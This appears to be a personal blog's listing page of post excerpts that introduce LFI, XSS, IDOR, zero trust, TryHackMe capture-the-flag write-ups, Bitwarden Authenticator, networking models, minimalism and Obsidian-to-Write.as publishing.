In the ever-evolving world of cybersecurity, understanding the various vulnerabilities that can be exploited by attackers is crucial for maintaining robust defenses. One such vulnerability that poses a significant risk is Local File Inclusion (LFI). This blog post aims to demystify LFI, explaining what it is, how it can be exploited, and what measures can be taken to prevent it.
For many people, a major pull toward minimalism is the simplicity it provides. Not only the aesthetic simplicity but also the simplicity of choice, of habit. Minimizing and restricting choices and options can actually liberate someone in a way that freedom of excess choice can not. I argue that a similar outcome can be achieved with something I call bulk decision-making.
I love using Write.as to host my blog. I love using Obsidian to manage the bulk of my second brain. And it's the love for these two products that eventually led me down a rabbit hole in search of a way to potentially integrate the two together. Not only did I find a solution, but it works even better than I could've imagined.
The internet is a dangerous place, full of vulnerabilities attackers leverage to malicious ends. One of the more common vulnerabilities that websites face is cross-site scripting (XSS) attacks. XSS attacks can have serious consequences, ranging from stealing sensitive information to defacing websites. Without wasting any time, let's jump into what XSS is, how it works, and how to mitigate it on your websites.
Brooklyn Nine Nine is an easy, beginner-friendly capture the flag exercise on TryHackMe. It features two different routes to gain both the initial foothold and the root flag. These avenues include weak passwords, poor FTP configuration, cleverly hidden credentials, and misconfigured sudo permissions.
Wgel CTF is an easy, beginner-friendly capture the flag exercise on TryHackMe. It features bad code commenting practices, a publicly available SSH key, and poorly configured sudo permissions which lead to exfiltration of data from the target server.
In cybersecurity, there is a buzzword I've seen some confusion about online recently. It's called zero trust, and though it sounds like vague corporate-ese at first, it actually represents a necessary approach to digital security.
Cyber threats are constantly evolving, and IT professionals need to be prepared for the worst at all times. Zero trust is a valid part of defense in depth and the principle of least privilege within a network or series of networks. But what exactly does that mean?
In infosec, there is a seemingly never ending list of acronyms any cyber professional must be familiar with in order to work efficiently and effectively. One of those is a common vulnerability known as IDOR.
IDOR stands for Insecure Direct Object Reference, and it's a type of vulnerability that can have serious implications for the security of web applications if not properly addressed. But what is it exactly?
Bitwarden is one of the best password managers in the business. It's easy to use, open-source, secure, and cross-platform. Honestly, there are very few downsides to using Bitwarden.
And, as many of you may know, a password manager's best friend is a solid 2FA client. Though Bitwarden supports 2FA passwords from within the password manager as a premium feature, it's always been a better security practice to keep those two things separate.
Now, the team behind Bitwarden are helping up your security game by offering 2FA functionality in a separate app: Bitwarden Authenticator.
In the world of networking, two fundamental models serve as the backbone for communication protocols and standards: the OSI model and the TCP/IP model. Both models are quite similar, providing frameworks for how data is transmitted across networks at various stages of the process.
Understanding these models is crucial for anyone working in IT, cybersecurity, or any related tech field. But what exactly are they?